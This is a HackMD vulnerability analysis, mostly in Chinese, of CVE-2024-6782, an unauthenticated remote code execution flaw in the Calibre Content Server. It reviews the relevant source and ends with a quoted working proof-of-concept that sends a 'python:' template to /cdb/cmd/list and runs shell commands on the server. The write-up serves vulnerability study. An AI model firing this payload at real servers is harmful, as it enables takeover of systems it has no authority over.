--- title: 'Calibre CVE: CVE-2024-6782' disqus: hackmd --- Calibre CVE: CVE-2024-6782 === # Table of Contents [TOC] # Info - [calibre github](https://github.com/kovidgoyal/calibre) ![image](https://hackmd.io/_uploads/S1455KvgJx.png) # CVE Info Title | Description | :------:|:---------------------| Vendor | Calibre | Severity | Critical | Versions | 6.9.0 ~ 7.14.0 | CVE Description | Improper Access Control in Calibre Content Server allows remote code execution | NIST Description | Improper access control in Calibre 6.9.0 ~ 7.14.0 allow unauthenticated attackers to achieve remote code execution. | CWE Classification(s) | CWE-863: Incorrect Authorization | CAPEC Classification(s) | CAPEC-253: Remote Code Inclusion | CVSS 3.x Severity | 9.8 CRITICAL [`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` ](https://hackmd.io/_uploads/SkIYsTfE1g.png) | MITRE Date Record Created | 20240716 | > Reference: > - [starlabs](https://starlabs.sg/advisories/24/24-6782/) > - [nvd.nist](https://nvd.nist.gov/vuln/detail/CVE-2024-6782) > - [cve.mitre](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6782) # Code Review ## src/calibre/db/cli/cmd.list.py ### 1. SQL fields 資料庫設定 ```pyhton=15 readonly = True version = 0 # change this if you change signature of implementation() FIELDS = { 'title', 'authors', 'author_sort', 'publisher', 'rating', 'timestamp', 'size', 'tags', 'comments', 'series', 'series_index', 'formats', 'isbn', 'uuid', 'pubdate', 'cover', 'last_modified', 'identifiers', 'languages', 'template' } ``` > fields name record\ > readonly ### 2. ebook format & path: `formats()` & `cover()` ```python=24 def formats(db, book_id): for fmt in db.formats(book_id, verify_formats=False): path = db.format_abspath(book_id, fmt) if path: yield path.replace(os.sep, '/') def cover(db, book_id): return db.format_abspath(book_id, '__COVER_INTERNAL__') ``` > Ebook format (db, bookid), 封面\ > file 絕對路徑 ### 3. sort fields: `implementation()`: 從資料庫中查書,回傳JSON ```python=35 def implementation( db, notify_changes, fields, sort_by, ascending, search_text, limit, template=None ): is_remote = notify_changes is not None formatter = None with db.safe_read_lock: fm = db.field_metadata afields = set(FIELDS) | {'id'} for k in fm.custom_field_keys(): afields.add('*' + k[1:]) if 'all' in fields: fields = sorted(afields if template else (afields - {'template'})) sort_by = sort_by or 'id' sort_fields = sort_by.split(',') for sf in sort_fields: if sf not in afields: return f'Unknown sort field: {sf}' sort_spec = [(sf, ascending) for sf in sort_fields] if not set(fields).issubset(afields): return 'Unknown fields: {}'.format(', '.join(set(fields) - afields)) if search_text: book_ids = db.multisort(sort_spec, ids_to_sort=db.search(search_text)) else: book_ids = db.multisort(sort_spec) if limit > -1: book_ids = book_ids[:limit] data = {} metadata = {} for field in fields: if field in 'id': continue if field == 'isbn': x = db.all_field_for('identifiers', book_ids, default_value={}) data[field] = {k: v.get('isbn') or '' for k, v in iteritems(x)} continue if field == 'template': vals = {} global_vars = {} if formatter is None: from calibre.ebooks.metadata.book.formatter import SafeFormat formatter = SafeFormat() for book_id in book_ids: mi = db.get_proxy_metadata(book_id) vals[book_id] = formatter.safe_format(template, {}, 'TEMPLATE ERROR', mi, global_vars=global_vars) data['template'] = vals continue field = field.replace('*', '#') metadata[field] = fm[field] if not is_remote: if field == 'formats': data[field] = {k: list(formats(db, k)) for k in book_ids} continue if field == 'cover': data[field] = {k: cover(db, k) for k in book_ids} continue data[field] = db.all_field_for(field, book_ids) return {'book_ids': book_ids, "data": data, 'metadata': metadata, 'fields':fields} ``` (v.7.21.0) 檢查 `notify_changes` , 遠端執行禁用 template\ > 驗證 afields(所有欄位) > 提取資料: >> (1) `id`: 忽略 id >> (2) `identifiers`: 從 identifiers 取 isbn >> (3) `template`: 如果未禁用,設定 SafeFormat()格式化工具 >> (4) field name: * replace # >> (5) `formats` call 上方 formats() 檔案格式路徑 >> (6) `cover` call 上方 cover() 封面檔案路徑 fields & book_ids structure example: ``` { 'title': {101: 'Harry Potter', 102: 'The Hobbit', 103: '1984'}, 'author': {101: 'J.K. Rowling', 102: 'J.R.R. Tolkien', 103: 'George Orwell'}, 'isbn': {101: '9780747532743', 102: '9780547928227', 103: '9780451524935'} } ``` ### 4. `do_list()` 輸出格式 ```python=147 def do_list( dbctx, fields, afields, sort_by, ascending, search_text, line_width, separator, prefix, limit, template, template_file, template_title, for_machine=False ): ``` - CLI `option_parser()`: 列出書籍 - `--fields`: 顯示指定欄位 (*authors) - `--sort-by`: 排序 - `--ascending`: 升降冪 - `--search`: 搜尋條件 - `--line-width`: single line 寬度 - `--separator`: 分隔字串的符號 - `--prefix`: 檔案路徑的前綴 - `--limit`: 限制顯示數量 - `--for-machine`: output JSON - `--template 和 --template_file`: 指定 template 路徑 - `--template_heading`: template title ## src/calibre/srv/cdb.py REST API ### 1. cdb_run: command module `@endpoint('/cdb/cmd/{which}/{version=0}', postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache')` {which}: module name\ {version=0}: module version ```python=28 @endpoint('/cdb/cmd/{which}/{version=0}', postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache') def cdb_run(ctx, rd, which, version): try: m = module_for_cmd(which) except ImportError: raise HTTPNotFound(f'No module named: {which}') if not getattr(m, 'readonly', False): ctx.check_for_write_access(rd) if getattr(m, 'version', 0) != int(version): raise HTTPNotFound(('The module {} is not available in version: {}.' 'Make sure the version of calibre used for the' ' server and calibredb match').format(which, version)) db = get_library_data(ctx, rd, strict_library_id=True)[0] if ctx.restriction_for(rd, db): raise HTTPForbidden('Cannot use the command-line db interface with a user who has per library restrictions') raw = rd.read() ct = rd.inheaders.get('Content-Type', all=True) ct = {x.lower().partition(';')[0] for x in ct} try: if MSGPACK_MIME in ct: args = msgpack_loads(raw) elif 'application/json' in ct: args = json_loads(raw) else: raise HTTPBadRequest('Only JSON or msgpack requests are supported') except Exception: raise HTTPBadRequest('args are not valid encoded data') if getattr(m, 'needs_srv_ctx', False): args = [ctx] + list(args) try: result = m.implementation(db, partial(ctx.notify_changes, db.backend.library_path), *args) except Exception as err: tb = '' if not getattr(err, 'suppress_traceback', False): import traceback tb = traceback.format_exc() return {'err': as_unicode(err), 'tb': tb} return {'result': result} ``` > 驗證寫入權限、版本、library_id、user權限\ > HTTP response (Content-Type: msgpack or JSON)\ > 呼叫 `implementation()`: `db`, `ctx.notify_changes`, `args` ```python=58 result = m.implementation(db, partial(ctx.notify_changes, db.backend.library_path), *args) ``` ### 2. cdb_add_book: Add book `@endpoint('/cdb/add-book/{job_id}/{add_duplicates}/{filename}/{library_id=None}', needs_db_write=True, postprocess=json, methods=receive_data_methods, cache_control='no-cache') ` {job_id}:task ID\ {add_duplicates}:新增重複書籍\ {filename}:書籍名稱\ {library_id}:指定目標書庫 ```python=68 @endpoint('/cdb/add-book/{job_id}/{add_duplicates}/{filename}/{library_id=None}', needs_db_write=True, postprocess=json, methods=receive_data_methods, cache_control='no-cache') def cdb_add_book(ctx, rd, job_id, add_duplicates, filename, library_id): ''' Add a file as a new book. The file contents must be in the body of the request. The response will also have the title/authors/languages read from the metadata of the file/filename. It will contain a `book_id` field specifying the id of the newly added book, or if add_duplicates is not specified and a duplicate was found, no book_id will be present, instead there will be a `duplicates` field specifying the title and authors for all duplicate matches. It will also return the value of `job_id` as the `id` field and `filename` as the `filename` field. ''' db = get_db(ctx, rd, library_id) if ctx.restriction_for(rd, db): raise HTTPForbidden('Cannot use the add book interface with a user who has per library restrictions') if not filename: raise HTTPBadRequest('An empty filename is not allowed') sfilename = sanitize_file_name(filename) fmt = os.path.splitext(sfilename)[1] fmt = fmt[1:] if fmt else None if not fmt: raise HTTPBadRequest('An filename with no extension is not allowed') if isinstance(rd.request_body_file, BytesIO): raise HTTPBadRequest('A request body containing the file data must be specified') add_duplicates = add_duplicates in ('y', '1') path = os.path.join(rd.tdir, sfilename) rd.request_body_file.seek(0) with open(path, 'wb') as f: shutil.copyfileobj(rd.request_body_file, f) from calibre.ebooks.metadata.worker import run_import_plugins path = run_import_plugins((path,), time.monotonic_ns(), rd.tdir)[0] with open(path, 'rb') as f: mi = get_metadata(f, stream_type=os.path.splitext(path)[1][1:], use_libprs_metadata=True) f.seek(0) nfmt = os.path.splitext(path)[1] fmt = nfmt[1:] if nfmt else fmt ids, duplicates = db.add_books([(mi, {fmt: f})], add_duplicates=add_duplicates) ans = {'title': mi.title, 'authors': mi.authors, 'languages': mi.languages, 'filename': filename, 'id': job_id} if ids: ans['book_id'] = ids[0] ctx.notify_changes(db.backend.library_path, books_added(ids)) else: ans['duplicates'] = [{'title': m.title, 'authors': m.authors} for m, _ in duplicates] return ans ``` > 驗證 user 資料庫訪問權限\ > Check filename & extension name\ > 提取書籍 metadata\ > 檢查重複 ### 3. cdb_delete_book: Delete book `@endpoint('/cdb/set-cover/{book_id}/{library_id=None}', types={'book_id': int}, needs_db_write=True, postprocess=json, methods=receive_data_methods, cache_control='no-cache')` {book_ids}: 刪除的 book ID {library_id}: 資料庫 ID ```python=116 @endpoint('/cdb/delete-books/{book_ids}/{library_id=None}', needs_db_write=True, postprocess=json, methods=receive_data_methods, cache_control='no-cache') def cdb_delete_book(ctx, rd, book_ids, library_id): db = get_db(ctx, rd, library_id) if ctx.restriction_for(rd, db): raise HTTPForbidden('Cannot use the delete book interface with a user who has per library restrictions') try: ids = {int(x) for x in book_ids.split(',')} except Exception: raise HTTPBadRequest(f'invalid book_ids: {book_ids}') db.remove_books(ids) ctx.notify_changes(db.backend.library_path, books_deleted(ids)) return {} ``` > 驗證 user 資料庫訪問權限\ > notify_changes 通知 Server 已刪除 ### 4. cdb_set_cover: Set cover `@endpoint('/cdb/set-cover/{book_id}/{library_id=None}', types={'book_id': int}, needs_db_write=True, postprocess=json, methods=receive_data_methods, cache_control='no-cache')` {book_ids}: 設置封面的 book ID {library_id}: 資料庫 ID ```python=131 @endpoint('/cdb/set-cover/{book_id}/{library_id=None}', types={'book_id': int}, needs_db_write=True, postprocess=json, methods=receive_data_methods, cache_control='no-cache') def cdb_set_cover(ctx, rd, book_id, library_id): db = get_db(ctx, rd, library_id) if ctx.restriction_for(rd, db): raise HTTPForbidden('Cannot use the add book interface with a user who has per library restrictions') rd.request_body_file.seek(0) dirtied = db.set_cover({book_id: rd.request_body_file}) ctx.notify_changes(db.backend.library_path, metadata(dirtied)) return tuple(dirtied) ``` ### 5. cdb_set_fields 編輯書籍 `@endpoint('/cdb/set-fields/{book_id}/{library_id=None}', types={'book_id': int}, needs_db_write=True, postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache')` {book_ids}: 編輯的 book ID {library_id}: 資料庫 ID ```pyhton=158 @endpoint('/cdb/set-fields/{book_id}/{library_id=None}', types={'book_id': int}, needs_db_write=True, postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache') def cdb_set_fields(ctx, rd, book_id, library_id): db = get_db(ctx, rd, library_id) if ctx.restriction_for(rd, db): raise HTTPForbidden('Cannot use the set fields interface with a user who has per library restrictions') data = load_payload_data(rd) try: changes, loaded_book_ids = data['changes'], frozenset(map(int, data.get('loaded_book_ids', ()))) all_dirtied = bool(data.get('all_dirtied')) if not isinstance(changes, dict): raise TypeError('changes must be a dict') except Exception: raise HTTPBadRequest( '''Data must be of the form {'changes': {'title': 'New Title', ...}, 'loaded_book_ids':[book_id1, book_id2, ...]'}''') dirtied = set() cdata = changes.pop('cover', False) if cdata is not False: if cdata is not None: try: cdata = from_base64_bytes(cdata.split(',', 1)[-1]) except Exception: raise HTTPBadRequest('Cover data is not valid base64 encoded data') try: fmt = what(None, cdata) except Exception: fmt = None if fmt not in ('jpeg', 'png'): raise HTTPBadRequest('Cover data must be either JPEG or PNG') dirtied |= db.set_cover({book_id: cdata}) added_formats = changes.pop('added_formats', False) if added_formats: for data in added_formats: try: fmt = data['ext'].upper() except Exception: raise HTTPBadRequest('Format has no extension') if fmt: try: fmt_data = from_base64_bytes(data['data_url'].split(',', 1)[-1]) except Exception: raise HTTPBadRequest('Format data is not valid base64 encoded data') if db.add_format(book_id, fmt, ReadOnlyFileBuffer(fmt_data)): dirtied.add(book_id) removed_formats = changes.pop('removed_formats', False) if removed_formats: db.remove_formats({book_id: list(removed_formats)}) dirtied.add(book_id) for field, value in iteritems(changes): dirtied |= db.set_field(field, {book_id: value}) ctx.notify_changes(db.backend.library_path, metadata(dirtied)) all_ids = dirtied if all_dirtied else (dirtied & loaded_book_ids) all_ids |= {book_id} return {bid: book_as_json(db, bid) for bid in all_ids} ``` > 驗證 user 資料庫訪問權限 > `library_id` 找資料庫\ > 載入 book file (JSON or msgpack)\ > 新增/刪除格式: added/delete_formats = changes.pop('added/delete_formats', False) ### 6. cdb_copy_to_library `@endpoint('/cdb/copy-to-library/{target_library_id}/{library_id=None}', needs_db_write=True, postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache')` ```python=216 @endpoint('/cdb/copy-to-library/{target_library_id}/{library_id=None}', needs_db_write=True, postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache') def cdb_copy_to_library(ctx, rd, target_library_id, library_id): db_src = get_db(ctx, rd, library_id) db_dest = get_db(ctx, rd, target_library_id) if ctx.restriction_for(rd, db_src) or ctx.restriction_for(rd, db_dest): raise HTTPForbidden('Cannot use the copy to library interface with a user who has per library restrictions') data = load_payload_data(rd) try: book_ids = {int(x) for x in data['book_ids']} move_books = bool(data.get('move', False)) preserve_date = bool(data.get('preserve_date', True)) duplicate_action = data.get('duplicate_action') or 'add' automerge_action = data.get('automerge_action') or 'overwrite' except Exception: raise HTTPBadRequest('Invalid encoded data, must be of the form: {book_ids: [id1, id2, ..]}') if duplicate_action not in ('add', 'add_formats_to_existing', 'ignore'): raise HTTPBadRequest('duplicate_action must be one of: add, add_formats_to_existing, ignore') if automerge_action not in ('overwrite', 'ignore', 'new record'): raise HTTPBadRequest('automerge_action must be one of: overwrite, ignore, new record') response = {} identical_books_data = None if duplicate_action != 'add': identical_books_data = db_dest.data_for_find_identical_books() to_remove = set() from calibre.db.copy_to_library import copy_one_book for book_id in book_ids: try: rdata = copy_one_book( book_id, db_src, db_dest, duplicate_action=duplicate_action, automerge_action=automerge_action, preserve_uuid=move_books, preserve_date=preserve_date, identical_books_data=identical_books_data) if move_books: to_remove.add(book_id) response[book_id] = {'ok': True, 'payload': rdata} except Exception: import traceback response[book_id] = {'ok': False, 'payload': traceback.format_exc()} if to_remove: db_src.remove_books(to_remove, permanent=True) return response ``` > 驗證 user 資料庫訪問權限\ > db_src & db_dest: 來源/目標 資料庫 > 1. duplicate_action 檢查重複 > 2. copy_one_book(...) > 刪除 src # Vulnerability Details `cdb.py` 透過呼叫 REST API 可以 route `cmd_list.py`。因此 `cdb.py` 可以透過 `/cdb/cmd/list` 動態載入 `cmd_list.py`,並執行其中的 implementation() 函數。 >[!Caution] > `cmd_list.py::implementation()` 繞過驗證 input 身份 ## 1. [src/calibre/srv/cdb.py](#1-cdb_run-command-module) 載入 module ```python=28 @endpoint('/cdb/cmd/{which}/{version=0}', postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache') def cdb_run(ctx, rd, which, version): try: m = module_for_cmd(which) except ImportError: raise HTTPNotFound(f'No module named: {which}') if not getattr(m, 'readonly', False): ctx.check_for_write_access(rd) if getattr(m, 'version', 0) != int(version): raise HTTPNotFound(('The module {} is not available in version: {}.' 'Make sure the version of calibre used for the' ' server and calibredb match').format(which, version)) ``` > code review 解釋的 {which} 會對應請求的子路徑。\ > 例如, /cdb/cmd/list 會導致載入 cmd_list.py\ > 若 module 為 readonly 或 設定為 false, 就不會執行check_for_write_access(rd), 以此繞過權限驗證。 ## 2. 偽造 template 輸入 `cmd_list.py::implementation()` 函數中,將 user input 當作 template 內容處理 ```python=70 if field == 'template': vals = {} global_vars = {} if formatter is None: from calibre.ebooks.metadata.book.formatter import SafeFormat formatter = SafeFormat() for book_id in book_ids: mi = db.get_proxy_metadata(book_id) vals[book_id] = formatter.safe_format(template, {}, 'TEMPLATE ERROR', mi, global_vars=global_vars) data['template'] = vals continue field = field.replace('*', '#') metadata[field] = fm[field] ``` > 只要讓 formatter.safe_format() 成功解析,可以自訂輸入 templaye 內容 ## 3. evaluate()執行前綴 `src/calibre/utils/formatter.py` 使用 evaluate(),可以以 `python:` 開頭前綴的輸入來任意執行 code ```python=1840 def evaluate(self, fmt, args, kwargs, global_vars, break_reporter=None): if fmt.startswith('program:'): ans = self._eval_program(kwargs.get('$', None), fmt[8:], self.column_name, global_vars, break_reporter) elif fmt.startswith('python:'): ans = self._eval_python_template(fmt[7:], self.column_name) else: ans = self.vformat(fmt, args, kwargs) if self.strip_results: ans = self.compress_spaces.sub(' ', ans) if self.strip_results: ans = ans.strip(' ') return ans ``` # Proof-of-Concept (Ref: [starlabs](https://starlabs.sg/advisories/24/24-6782/#proof-of-concept)) ```pyhton= #! /usr/bin/env python3 # PoC for: CVE-2024-6782 # Description: Unauthenticated remote code execution in calibre <= 7.14.0 # Written by: Amos Ng (@LFlare) import json import sys import requests _target = "http://localhost:8080" def exploit(cmd): r = requests.post( f"{_target}/cdb/cmd/list", headers={"Content-Type": "application/json"}, json=[ ["template"], "", # sortby: leave empty "", # ascending: leave empty "", # search_text: leave empty, set to all 1, # limit results f"python:def evaluate(a, b):\n import subprocess\n try:\n return subprocess.check_output(['cmd.exe', '/c', '{cmd}']).decode()\n except Exception:\n return subprocess.check_output(['sh', '-c', '{cmd}']).decode()", # payload ], ) try: print(list(r.json()["result"]["data"]["template"].values())[0]) except Exception as e: print(r.text) if __name__ == "__main__": exploit("whoami") ``` template 內容 ```python python:def evaluate(a, b): import subprocess try: return subprocess.check_output(['cmd.exe', '/c', '{cmd}']).decode() except Exception: return subprocess.check_output(['sh', '-c', '{cmd}']).decode() ``` # Patch https://github.com/kovidgoyal/calibre/commit/38a1bf50d8cd22052ae59c513816706c6445d5e9